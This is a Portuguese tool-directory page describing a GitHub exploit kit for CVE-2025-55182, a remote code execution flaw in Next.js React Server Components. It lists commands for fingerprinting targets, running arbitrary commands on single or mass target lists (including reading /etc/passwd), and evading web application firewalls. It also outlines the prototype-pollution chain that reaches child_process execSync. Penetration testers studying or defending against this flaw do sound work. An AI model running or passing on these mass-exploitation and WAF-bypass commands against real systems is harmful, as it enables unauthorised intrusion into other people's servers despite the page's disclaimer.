Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-NextJS-Scanner-React2Shell-PoC — Kit automatizado de detecção e exploração para CVE-2025-55182, uma RCE crítica nos componentes do servidor React do Next.js. Inclui fingerprinting em múltiplas camadas, bypass de WAF e varredura em massa para testes de penetração. | Kitploit
Ferramentas/GitHubGitHub/exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc
ReconhecimentoScanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebBypass de WAFTestes de PenetraçãoComando e Controle

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc

CVE-2025-55182-NextJS-Scanner-React2Shell-PoC

Kit automatizado de detecção e exploração para CVE-2025-55182, uma RCE crítica nos componentes do servidor React do Next.js. Inclui fingerprinting em múltiplas camadas, bypass de WAF e varredura em massa para testes de penetração.

Ver Repositório
3há 9 mesesAinda não revisado
Compartilhar

Ferramenta de Exploração CVE-2025-55182

Uma ferramenta abrangente de pesquisa em segurança para testar a vulnerabilidade de Execução Remota de Código (RCE) em Next.js React Server Components (CVE-2025-55182).

Visão Geral

Este kit de ferramentas oferece capacidades automatizadas de detecção e exploração para CVE-2025-55182, uma vulnerabilidade crítica de RCE que afeta aplicações Next.js que utilizam React Server Components. O kit consiste em três componentes integrados:

  • NextApp.py - Scanner inteligente de impressão digital de aplicações Next.js
  • exploit.sh - Ferramenta flexível de exploração para alvos únicos ou em massa
  • auto_exploit.sh - Orquestrador automatizado de varredura e exploração de ponta a ponta

Funcionalidades

  • Detecção Multicamadas: Análise de cabeçalhos, varredura de corpo e impressão digital de JavaScript
  • Pontuação de Confiança: Classificação inteligente (Alta/Média/Baixa) para minimizar falsos positivos
  • Bypass de WAF: Técnicas integradas para evadir firewalls de aplicações web comuns
  • Varredura em Massa: Processe múltiplos alvos eficientemente com relatórios detalhados
  • Fluxo de Trabalho Automatizado: Detecção e exploração com um único comando
  • Relatórios Detalhados: Arquivos de saída abrangentes com resultados categorizados

Requisitos

Componentes Python

  • Python 3.x
  • Biblioteca requests
root@kitploit:~
pip3 install requests

Componentes Bash

  • curl
  • openssl
  • Utilitários Unix padrão (sed, grep, awk, mktemp)

Instalação

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh

Uso

Início Rápido (Recomendado)

A maneira mais rápida de varrer e explorar alvos:

root@kitploit:~
# Create a file with target URLs (one per line)
echo "https://example.com" > targets.txt

# Auto-scan and exploit in one command
./auto_exploit.sh -i targets.txt -s -c "id"

Apenas Detecção

Identifique aplicações Next.js sem exploração:

root@kitploit:~
python3 NextApp.py targets.txt

Arquivos de saída:

  • confirmed_nextjs_targets.txt - Todas as aplicações Next.js detectadas
  • high_confidence_nextjs_targets.txt - Apenas detecções de alta confiança

Exploração de Alvo Único

Teste alvos individuais:

root@kitploit:~
# Basic exploitation
./exploit.sh -d https://target.com -c "whoami"

# With WAF bypass
./exploit.sh -d target.com -c "cat /etc/passwd" -w

# Custom WAF bypass size
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256

# Skip SSL verification
./exploit.sh -d https://target.com -c "id" -k

Exploração em Massa

Opção 1: Fluxo de Trabalho Unificado (Recomendado)

root@kitploit:~
./auto_exploit.sh -i targets.txt -s -c "whoami"

Opção 2: Fluxo de Trabalho Manual em Duas Etapas

root@kitploit:~
# Step 1: Detect Next.js applications
python3 NextApp.py targets.txt

# Step 2: Exploit confirmed targets
./auto_exploit.sh -c "id"

Opções Avançadas

root@kitploit:~
# Full auto-scan with WAF bypass
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"

# Custom delays and timeouts
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"

# Skip SSL verification in bulk mode
./auto_exploit.sh -i targets.txt -s -k -c "hostname"

Referência de Comandos

NextApp.py

root@kitploit:~
python3 NextApp.py <targets_file>

Argumentos:

  • targets_file - Arquivo de texto contendo URLs de alvos (um por linha)

exploit.sh

root@kitploit:~
./exploit.sh [OPTIONS]

Opções:

OpçãoDescriçãoPadrão
-d, --domainDomínio/URL do alvohttp://localhost:3000
-f, --fileArquivo com lista de alvos-
-c, --commandComando a executarid
-w, --waf-bypassAtivar bypass de WAFDesativado
--waf-size SIZETamanho dos dados de bypass de WAF (KB)128
--timeout SECONDSTimeout da requisição15
-k, --insecureIgnorar verificação SSLDesativado
--user-agent AGENTUser-Agent personalizadoMozilla/5.0...
-h, --helpMostrar mensagem de ajuda-

auto_exploit.sh

root@kitploit:~
./auto_exploit.sh [OPTIONS]

Opções:

OpçãoDescriçãoPadrão
-i, --input FILEArquivo de entrada de alvosconfirmed_nextjs_targets.txt
-o, --output FILEArquivo de saída de resultadosexploit_results.txt
-c, --command CMDComando a executarid
-w, --waf-bypassAtivar bypass de WAFDesativado
--waf-size SIZETamanho do bypass de WAF (KB)128
--timeout SECONDSTimeout da requisição15
-k, --insecureIgnorar verificação SSLDesativado
--delay SECONDSAtraso entre requisições2
-s, --scanAuto-varredura primeiro para Next.jsDesativado
-h, --helpMostrar mensagem de ajuda-

Arquivos de Saída

confirmed_nextjs_targets.txt

Gerado por NextApp.py - contém todas as URLs identificadas como aplicações Next.js.

high_confidence_nextjs_targets.txt

Gerado por NextApp.py - contém apenas detecções Next.js de alta confiança (pontuação de confiança 100+).

exploit_results.txt

Gerado por auto_exploit.sh - relatório abrangente de exploração incluindo:

  • Alvos vulneráveis com saída do comando
  • Alvos não vulneráveis
  • Erros e seus detalhes
  • Estatísticas resumidas

Metodologia de Detecção

O scanner utiliza múltiplas técnicas de detecção com um sistema de pontuação de confiança:

Análise de Cabeçalhos (50 pontos cada)

  • Cabeçalhos específicos do Next.js: x-nextjs-*, x-vercel-*
  • x-powered-by: Next.js
  • Server: Vercel

Varredura de Corpo

  • Presença de __NEXT_DATA__ (100 pontos)
  • Padrão de buildId do Next.js (50 pontos)
  • Caminhos de ativos _next/* (25-75 pontos com base na quantidade)

Impressão Digital de JavaScript (60 pontos)

  • __NEXT_DATA__, __NEXT_LOADED_PAGES__
  • middlewareManifest, self.__RSC_MANIFEST

Limiares de Confiança:

  • Alta (100+): Múltiplos indicadores fortes
  • Média (75-99): Vários indicadores moderados
  • Baixa (50-74): Evidência mínima
  • Abaixo de 50: Rejeitado como falso positivo

Mecanismo de Exploração

O exploit aproveita uma cadeia de poluição de protótipo nos React Server Components do Next.js:

  1. Constrói dados de formulário multiparte com payload aninhado
  2. Polui a cadeia __proto__ via desserialização JSON
  3. Injeta JavaScript arbitrário em _response._prefix
  4. Executa comandos via process.mainModule.require('child_process').execSync()
  5. Extrai resultados do cabeçalho X-Action-Redirect
  6. Decodifica URL e formata a saída

Técnicas de Bypass de WAF

O kit de ferramentas inclui capacidades integradas de bypass de WAF:

  • Injeção de Dados Lixo: Prefixa dados aleatórios para evadir filtros baseados em tamanho
  • Limites Dinâmicos: Limites multiparte aleatórios
  • Randomização de ID de Requisição: IDs únicos por requisição
  • Tamanho Configurável: Tamanho ajustável de dados lixo (padrão 128KB)

Ative com as flags -w ou --waf-bypass.

Exemplos

Varrer e Explorar Aplicação Web

root@kitploit:~
# Create target list
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF

# Run unified scan
./auto_exploit.sh -i targets.txt -s -c "whoami"

# Check results
cat exploit_results.txt

Testar Alvo Único com Bypass de WAF

root@kitploit:~
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

Apenas Alvos de Alta Confiança

root@kitploit:~
# Step 1: Detect and filter
python3 NextApp.py targets.txt

# Step 2: Exploit high-confidence only
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"

Aviso Legal

Esta ferramenta destina-se apenas a testes de segurança autorizados e fins de pesquisa. Os usuários devem:

  • ✅ Obter permissão explícita por escrito antes de testar qualquer sistema
  • ✅ Usar apenas em engajamentos autorizados de teste de penetração
  • ✅ Cumprir todas as leis e regulamentos aplicáveis
  • ✅ Usar para pesquisa defensiva de segurança e competições CTF

O acesso não autorizado a sistemas de computador é ilegal. Os autores não assumem nenhuma responsabilidade pelo uso indevido desta ferramenta.

Informações da Vulnerabilidade

  • CVE ID: CVE-2025-55182
  • Afetados: Next.js React Server Components
  • Tipo: Execução Remota de Código (RCE)
  • Gravidade: Crítica

Créditos

Agradecimentos aos pesquisadores de segurança que descobriram e divulgaram esta vulnerabilidade:

  • @zack0x01
  • @infosec_au
  • @pdiscoveryio

Contribuindo

Contribuições são bem-vindas! Por favor:

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade
  3. Faça commit de suas alterações
  4. Envie um pull request

Suporte

Para problemas, perguntas ou solicitações de funcionalidades, por favor abra uma issue no GitHub.

Licença

Este projeto é fornecido para fins educacionais e de testes de segurança autorizados. Use de forma responsável e ética.

Baixar ferramenta